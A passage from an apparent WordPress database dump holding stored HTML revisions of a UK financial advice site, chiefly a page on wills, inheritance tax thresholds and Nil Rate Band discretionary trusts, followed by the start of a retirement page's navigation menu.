/></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"9\"><a href=\"/\"><img id=\"investments_r3_c1\" src=\"/images/investments_r3_c1.jpg\" alt=\"Wealth Management - Financial Advice and Information\" width=\"353\" height=\"96\" name=\"investments_r3_c1\" border=\"0\" /></a></td>\r\n<td colspan=\"8\" valign=\"top\">\r\n<div style=\"font-size: 19px; text-align: right; margin-right: 30px;\">Offices throughout the UK,\r\n\r\ncall us for expert financial advice -\r\n\r\n<script type=\"text/javascript\" src=\"/jsapi.js\"></script><script type=\"text/javascript\"><![CDATA[ google.load(\'search\', \'1\'); google.setOnLoadCallback(function() { google.search.CustomSearchControl.attachAutoCompletion( \'011057125409238421392:utfk3c-gm7e\', document.getElementById(\'q\'), \'cse-search-box\'); }); ]]></script><form id=\"cse-search-box\" action=\"../../search-results/\">&nbsp;\r\n<div>\r\n<input name=\"cx\" type=\"hidden\" value=\"011057125409238421392:utfk3c-gm7e\" /><input name=\"cof\" type=\"hidden\" value=\"FORID:9\" /><input name=\"ie\" type=\"hidden\" value=\"UTF-8\" /><input id=\"q\" autocomplete=\"on\" name=\"q\" size=\"21\" type=\"text\" /><input name=\"sa\" type=\"submit\" value=\"Search our Site\" /></div>\r\n<script type=\"text/javascript\" src=\"/cse/brand_form_cse-search-box_amp_lang_en_amp_sitesearch_true.js\"></script>\r\n\r\n</form></div></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"96\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"5\"><a href=\"/\"><img id=\"investments_r4_c1\" src=\"/images/investments_r4_c1.jpg\" alt=\"Home Page\" width=\"120\" height=\"50\" name=\"investments_r4_c1\" border=\"0\" /></a></td>\r\n<td colspan=\"3\"><a href=\"/pension\"><img id=\"investments_r4_c6\" src=\"/images/investments_r4_c6.jpg\" alt=\"Pension Advice\" width=\"124\" height=\"50\" name=\"investments_r4_c6\" border=\"0\" /></a></td>\r\n<td colspan=\"2\"><a href=\"/investments\"><img id=\"investments_r4_c9\" src=\"/images/investments_r4_c9.jpg\" alt=\"Savings &amp; Investments\" width=\"153\" height=\"50\" name=\"investments_r4_c9\" border=\"0\" /></a></td>\r\n<td><a href=\"/trusts-protection\"><img id=\"investments_r4_c11\" src=\"/images/investments_r4_c11_f2.jpg\" alt=\"Trusts and Bonds\" width=\"109\" height=\"50\" name=\"investments_r4_c11\" border=\"0\" /></a></td>\r\n<td colspan=\"3\"><a href=\"/wealth-platform\"><img id=\"index_r4_c11\" src=\"/images/index_r4_c11.jpg\" alt=\"Wealth Management\" width=\"158\" height=\"50\" name=\"index_r4_c11\" border=\"0\" /></a></td>\r\n<td><a href=\"/about-us\"><img id=\"investments_r4_c15\" src=\"/images/investments_r4_c15.jpg\" alt=\"About Us\" width=\"138\" height=\"50\" name=\"investments_r4_c15\" border=\"0\" /></a></td>\r\n<td colspan=\"2\"><a href=\"/contact-us\"><img id=\"investments_r4_c16\" src=\"/images/investments_r4_c16.jpg\" alt=\"Contact Us\" width=\"148\" height=\"50\" name=\"investments_r4_c16\" border=\"0\" /></a></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"50\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td rowspan=\"9\"><img id=\"investments_r5_c1\" src=\"/images/investments_r5_c1.jpg\" alt=\"\" width=\"10\" height=\"545\" name=\"investments_r5_c1\" border=\"0\" /></td>\r\n<td colspan=\"15\">\r\n<div id=\"breadcrumb\"><a href=\"/\">home</a> &gt; <a href=\"/trusts-protection\">trusts and protection</a> &gt; wills and trust</div>\r\n&nbsp;\r\n<h1>Wills and Trust</h1>\r\n</td>\r\n<td rowspan=\"4\"><img id=\"investments_r5_c17\" src=\"/images/investments_r5_c17.jpg\" alt=\"\" width=\"19\" height=\"260\" name=\"investments_r5_c17\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"63\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"6\"><img id=\"investments_r6_c2\" src=\"/images/investments_r6_c2.jpg\" alt=\"\" width=\"204\" height=\"9\" name=\"investments_r6_c2\" border=\"0\" /></td>\r\n<td colspan=\"9\" rowspan=\"8\" valign=\"top\"><img id=\"investments_r6_c8\" src=\"/images/wills-trusts.jpg\" alt=\"Wills and Trust\" width=\"450\" height=\"197\" name=\"investments_r6_c8\" align=\"right\" border=\"0\" />\r\n<div class=\"paracontent3\">\r\n\r\n&nbsp;\r\n\r\nAny transfers between a husband and wife, or civil partner, are exempt for inheritance tax which means that none is payable upon the death of the first spouse.\r\n\r\n&nbsp;\r\n\r\nWith the death of the surviving spouse, however, this tax then becomes due on the estate held by them, should its value exceed £650,000.\r\n\r\n&nbsp;\r\n\r\nAny balance over the threshold of £650,000 is liable to taxation at a rate of 40%; however, it is still very important to ensure that wills and trusts are put in place to make sure that your estate planning runs smoothly.\r\n\r\n&nbsp;\r\n\r\nCreating a standard will, in which all inheritance is left to the spouse, may avoid the paying of inheritance tax. Whilst it is possible to leave up to £325,000 without this tax becoming payable, for example, to your children, this could leave your spouse with some financial difficulties.\r\n\r\n&nbsp;\r\n\r\nIn the case of joint estates, it is no longer necessary to have Nil Rate Band Discretionary Trusts if the value is under £650,000 but in some situation, they can prove to be very useful indeed. For mitigation of inheritance tax, Nil Rate Band planning is not usually considered; however, it is often used for protection in certain situations.\r\n\r\n&nbsp;\r\n\r\n</div></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"9\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\" rowspan=\"7\" valign=\"top\"><img id=\"investments_r7_c2\" src=\"/images/investments_r7_c2.jpg\" alt=\"\" width=\"32\" height=\"480\" name=\"investments_r7_c2\" border=\"0\" /></td>\r\n<td class=\"related\" style=\"background-image: url(\'/images/investments_r7_c4.jpg\'); background-repeat: no-repeat;\" colspan=\"3\" valign=\"top\">Related Pages</td>\r\n<td rowspan=\"6\" valign=\"top\"><img id=\"investments_r7_c7\" src=\"/images/investments_r7_c7.jpg\" alt=\"\" width=\"16\" height=\"480\" name=\"investments_r7_c7\" align=\"top\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"34\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td class=\"relatedlinks\" style=\"background-image: url(\'/images/investments_r13_c4.jpg\'); background-position: bottom; background-repeat: no-repeat;\" colspan=\"3\" rowspan=\"5\" valign=\"top\"><a href=\"/asset-protection\">Asset Protection Trust</a>\r\n\r\nhelping you protect, what you could easily lose<a href=\"/discretionary-trusts\">Discretionary Trusts</a>\r\n\r\nthe trustees have \'discretion\' about how to use the income received by the trust\r\n\r\n<a href=\"/absolute-trust\">Absolute Trust</a>\r\n\r\na trust for when you are certain about who you wish to benefit\r\n\r\n<a href=\"/gift-loan-schemes\">Gift &amp; Loan Schemes</a>\r\n\r\nfind out how to reduce your Inheritance Tax liability\r\n\r\n<a href=\"/wills-trust\">Wills &amp; Trust</a>\r\n\r\nremain an important estate planning mechanism for us all</td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"154\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td rowspan=\"5\" valign=\"top\"></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"71\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"108\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"24\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"58\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" valign=\"top\"></td>\r\n<td></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"24\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"17\"><img id=\"investments_r14_c1\" src=\"/images/investments_r14_c1.jpg\" alt=\"\" width=\"950\" height=\"8\" name=\"investments_r14_c1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"8\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td rowspan=\"2\"><img id=\"investments_r15_c1\" src=\"/images/investments_r15_c1.jpg\" alt=\"\" width=\"10\" height=\"245\" name=\"investments_r15_c1\" border=\"0\" /></td>\r\n<td rowspan=\"2\"><img id=\"investments_r15_c2\" src=\"/images/investments_r15_c2.jpg\" alt=\"\" width=\"18\" height=\"245\" name=\"investments_r15_c2\" border=\"0\" /></td>\r\n<td colspan=\"10\">\r\n<h2>more information on Wills and Trust ...</h2>\r\n</td>\r\n<td rowspan=\"2\"><img id=\"investments_r15_c13\" src=\"/images/investments_r15_c13.jpg\" alt=\"\" width=\"11\" height=\"245\" name=\"investments_r15_c13\" border=\"0\" /></td>\r\n<td colspan=\"3\">\r\n<div class=\"moreinfo\">Contact Us for Advice</div></td>\r\n<td rowspan=\"2\"><img id=\"investments_r15_c17\" src=\"/images/investments_r15_c17.jpg\" alt=\"\" width=\"19\" height=\"245\" name=\"investments_r15_c17\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"54\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"10\" valign=\"top\">\r\n<div class=\"paracontent2\">\r\nSOME OF THE MAJOR BENEFITS OF DISCRETIONARY TRUST SCHEMES FOLLOW\r\n<ul>\r\n<ul>\r\n 	<li>\r\nAccess to Financial Funds by the Surviving Spouse</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul>\r\n<ul>\r\n 	<li>The surviving spouse may be entitled to interest free loans which then become repayable upon their death, thereby further reducing their IHT liability.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul>\r\n<ul>\r\n 	<li>If the surviving spouse requires long term care, all assets which are held in trust are not deemed to be capital.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul>\r\n<ul>\r\n 	<li>It ensures that assets which are held in trust are passed to your children, rather than those of a new partner of your spouse, should they re-marry.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul>\r\n<ul>\r\n 	<li>Offers a degree of protection against bankruptcy, should it occur.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\nOTHER IMPORTANT CONSIDERATIONS:\r\nUpon death, all joint assets are passed directly to the surviving spouse and are not passed under the will. These assets cannot be used to fund the Trust Fund. It is possible that it may be necessary to equalise the respective estates to be certain that both spouses have sufficient assets each, so that the Nil Rate Band Trust can be used to its greatest effect.\r\nIn the vast majority of situations, it is the family home which is the largest asset owned by both spouses, together. It may, on occasion, be necessary to divide any properties between the spouses in order to ensure that each has sufficient sole assets to be able to satisfy the Nil Rate Band Trust. With each then owning 50% of the property, on the death of the first spouse, their 50% share can be used to satisfy the Nil Rate Band Discretionary Trusts.\r\nBy using specialist terminology within the trust, it is possible for the surviving spouse to remain in possession of the whole property, but the value of the share of the deceased person will be out with the surviving spouse’s estate. All assets in this type of trust arrangement can not be regarded as capital held by the spouse, should they require long term care\r\n\r\n&nbsp;\r\n\r\n</div></td>\r\n<td colspan=\"3\" valign=\"top\">\r\n<div id=\"form\" class=\"form\" style=\"width: 310; height: 125px; text-align: right; font-size: 12px; color: #600000; font-weight: bold; margin-left: 6px;\">\r\n\r\n&nbsp;\r\n\r\n<form id=\"form\" action=\"../../thank-you/\" method=\"post\" name=\"form\">\r\n<table border=\"0\" width=\"280\" cellspacing=\"4\" cellpadding=\"1\" align=\"right\">\r\n<tbody>\r\n<tr>\r\n<td style=\"text-align: left;\" width=\"117\">First name:\r\n<input id=\"name\" style=\"border: thin solid #999;\" name=\"name\" size=\"15\" type=\"text\" /></td>\r\n<td style=\"text-align: left;\" width=\"168\">Surname:\r\n\r\n<input id=\"surname\" style=\"border: thin solid #999;\" name=\"surname\" size=\"17\" type=\"text\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: left;\">Email:\r\n<input id=\"email\" style=\"border: thin solid #999;\" name=\"email\" size=\"15\" type=\"text\" /></td>\r\n<td style=\"text-align: left;\">Daytime Tel:\r\n<input id=\"telephone\" style=\"border: thin solid #999;\" name=\"telephone\" size=\"17\" type=\"text\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: left;\">Evening Tel:\r\n<input id=\"telephone2\" style=\"border: thin solid #999;\" name=\"telephone2\" size=\"15\" type=\"text\" /></td>\r\n<td style=\"text-align: left;\">Postcode:\r\n<input id=\"postcode\" style=\"border: thin solid #999;\" name=\"postcode\" size=\"17\" type=\"text\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: left;\">Date of Birth:\r\n<input id=\"dob\" style=\"border: thin solid #999;\" name=\"dob\" size=\"15\" type=\"text\" value=\"dd/mm/yy\" /></td>\r\n<td style=\"text-align: left;\">Intestested In?\r\n<select id=\"interested\" name=\"interested\">\r\n<option value=\"--\">--</option>\r\n<option value=\"asset\">Asset Trust</option>\r\n<option value=\"discretionery\">Discretionery</option>\r\n<option value=\"absolute\">Absolute Trust</option>\r\n<option value=\"business\">Business Protection</option>\r\n<option selected=\"selected\" value=\"wills\">Wills and Trust</option>\r\n</select></td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: left;\"></td>\r\n<td style=\"text-align: left;\"><label>\r\n<input id=\"submit\" alt=\"Savings &amp; Investments\" name=\"submit\" src=\"/images/submit.jpg\" type=\"image\" value=\"Submit\" align=\"right\" /></label></td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: left;\"></td>\r\n<td style=\"text-align: left;\"></td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: left;\" colspan=\"2\">\r\n<div style=\"padding: 5px; font-weight: normal; border: thin dotted #999;\">Note: The Financial Services Authority does not regulate some forms of tax advice, trusts &amp; wills</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n</form></div></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"191\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"17\"><img id=\"investments_r17_c1\" src=\"/images/investments_r17_c1.jpg\" alt=\"\" width=\"950\" height=\"6\" name=\"investments_r17_c1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"6\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"background-image: url(\'/images/index_r16_c1.jpg\'); background-repeat: no-repeat; color: #333;\" colspan=\"17\" valign=\"top\"></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"75\" border=\"0\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<script type=\"text/javascript\"><![CDATA[ var gaJsHost = ((\"https:\" == document.location.protocol) ? \"https://ssl.\" : \"http://www.\"); document.write(unescape(\"%3Cscript src=\'\" + gaJsHost + \"google-analytics.com/ga.js\' type=\'text/javascript\'%3E%3C/script%3E\")); ]]></script><script type=\"text/javascript\"><![CDATA[ try { var pageTracker = _gat._getTracker(\"UA-10958181-3\"); pageTracker._trackPageview(); } catch(err) {}]]></script><script type=\"text/javascript\"><![CDATA[ var adiInit =\"488\"; (function() { var adiSrc = document.createElement(\"script\"); adiSrc.type = \"text/javascript\"; adiSrc.async = true; adiSrc.src = (\"https:\" == document.location.protocol ? \"https://\" : \"http://\") + \"static.adinsight.eu/static/scripts/adiTrack.min.js\"; var s = document.getElementsByTagName(\"script\")[0]; s.parentNode.insertBefore(adiSrc, s); })(); ]]></script>','Wills and Trust - Important Estate Planning Mechanism','Wills and Trusts remain an important estate planning mechanism for us all.  Call Equity SMART on 01272 225114 to get advice from one of our experts.','inherit','closed','closed','','121-revision-v1','','','2017-09-21 17:01:12','2017-09-21 17:01:12','',121,'http://www.equalitywalk.org.uk/121-revision-v1',0,'revision','',0),(304,1,'2017-09-21 17:02:55','2017-09-21 17:02:55','&nbsp;\n<div id=\"wrapper\">\n\n&nbsp;\n<div class=\"header-wrapper\">\n\n&nbsp;\n<div class=\"header-v3\">\n<header id=\"header\">\n<div class=\"avada-row\" style=\"margin-top: 0px; margin-bottom: 0px;\">\n\n&nbsp;\n<div class=\"logo\" style=\"margin: 15px 0px 15px 0px;\">\n<a href=\"/\">\n\n</a></div>\n&nbsp;\n\n<nav id=\"nav\" class=\"nav-holder\">\n<ul class=\"navigation menu fusion-navbar-nav\">\n<ul class=\"navigation menu fusion-navbar-nav\">\n 	<li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214 fusion-dropdown-menu\"><a href=\"../wealth-management/\">Wealth Management</a>\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44 fusion-dropdown-submenu\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>\n</ul>\n</ul>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"navigation menu fusion-navbar-nav\">\n<ul class=\"navigation menu fusion-navbar-nav\">\n 	<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27 fusion-megamenu-menu\"><a href=\"../pensions/\">Pensions</a>\n<div class=\"fusion-megamenu-wrapper columns-3 col-span-12 container\">\n<div class=\"row\">\n<ul class=\"fusion-megamenu-holder\">\n<ul class=\"fusion-megamenu-holder\">\n<ul class=\"fusion-megamenu \">\n 	<li id=\"menu-item-8353\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8353 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\">\n<h3 class=\"fusion-megamenu-title\">Pensions</h3>\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pensions/pension-review/\">Pension Review</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\">SIPPS</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\">Pension Release</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\">Pension Transfer</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\">Lost Pension</a></li>\n</ul>\n</ul>\n&nbsp;</li>\n</ul>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"fusion-megamenu-holder\">\n<ul class=\"fusion-megamenu-holder\">\n<ul class=\"fusion-megamenu \">\n 	<li id=\"menu-item-8579\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8579 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\">\n<h3 class=\"fusion-megamenu-title\">At Retirement</h3>\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\">Income Drawdown</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-8599\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-8599\"><a href=\"../best-annuity-rates/\">Annuities</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-8580\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8580\">\n<div class=\"fusion-megamenu-widgets-container\">\n<div id=\"wooslider_slideshow_posts-2\" class=\"widget widget_wooslider_slideshow_posts\">\n<div id=\"wooslider-id-1\" class=\"wooslider wooslider-id-1 wooslider-type-posts wooslider-theme-default\">\n<ul class=\"slides\">\n<ul class=\"slides\">\n 	<li class=\"slide\">\n<div class=\"layout-text-left overlay-none\">\n\n&nbsp;\n<div class=\"slide-excerpt\">\n<h2 class=\"slide-title\"><a href=\"../better-pension-drawdown-annuity/\">Which is Better Pension Drawdown or Annuity?</a></h2>\n</div>\n</div></li>\n</ul>\n</ul>\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n</div></li>\n</ul>\n</ul>\n&nbsp;</li>\n</ul>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"fusion-megamenu-holder\">\n<ul class=\"fusion-megamenu-holder\">\n<ul class=\"fusion-megamenu \">\n 	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\">\n<h3 class=\"fusion-megamenu-title\">For Business</h3>\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\">Auto Enrolment Pensions</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\">Auto Enrolment Report</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\">Group Pension Plan</a></li>\n</ul>\n</ul>\n&nbsp;</li>\n</ul>\n</ul>\n</ul>\n&nbsp;\n<div style=\"clear: both;\"></div>\n</div>\n&nbsp;\n\n</div>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"navigation menu fusion-navbar-nav\">\n<ul class=\"navigation menu fusion-navbar-nav\">\n 	<li id=\"menu-item-8624\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8624 fusion-megamenu-menu\"><a>Other Services</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"navigation menu fusion-navbar-nav\">\n<ul class=\"navigation menu fusion-navbar-nav\">\n 	<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"../about-us/\">About</a>\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"../our-team/\">Our Team</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\">Login</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"../cookies/\">Cookies</a></li>\n</ul>\n</ul>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"navigation menu fusion-navbar-nav\">\n<ul class=\"navigation menu fusion-navbar-nav\">\n 	<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a>Blog</a>\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-8734\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8734 fusion-dropdown-submenu\"><a href=\"../category/video-2/\">Watch Our Blog</a>\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-8732\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8732\"><a href=\"../pension-reforms-offer-freedom-savers/\">Pension Reforms Offer Freedom to Savers</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-8771\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8771\"><a href=\"../staging-date-social-advisors/\">When is your Staging Date?</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-8781\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8781\"><a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-8780\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8780\"><a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a></li>\n</ul>\n</ul>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-8733\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8733 fusion-dropdown-submenu\"><a href=\"../our-blog/\">Read Our Blog</a>\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-8587\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8587\"><a href=\"../category/annuities/\">Annuities</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-8588\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8588\"><a href=\"../category/insurance-protection/\">Insurance Protection</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-8589\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8589\"><a href=\"../category\">Investments</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-8590\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-8590\"><a href=\"../category/pensions/\">Pensions</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-8591\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8591\"><a href=\"../category/\">Trusts</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-8592\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8592\"><a href=\"../category/wealth-management/\">Wealth Management</a></li>\n</ul>\n</ul>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n\n</nav>\n<div class=\"mobile-nav-holder main-menu\"></div>\n</div>\n&nbsp;\n\n</header></div>\n<div class=\"init-sticky-header\"></div>\n</div>\n&nbsp;\n<div id=\"sliders-container\"></div>\n&nbsp;\n<div class=\"page-title-container\">\n\n&nbsp;\n<div class=\"page-title\">\n\n&nbsp;\n<div class=\"page-title-wrapper\">\n\n&nbsp;\n<div class=\"page-title-captions\">\n\n&nbsp;\n<h1 class=\"entry-title\">\nApproaching Retirement?</h1>\n&nbsp;\n\n</div>\n&nbsp;\n<ul class=\"breadcrumbs\">\n 	<li><a href=\"/\">Home</a></li>\n 	<li><a title=\"Pensions\" href=\"../category/pensions/\">Pensions</a></li>\n 	<li>Approaching 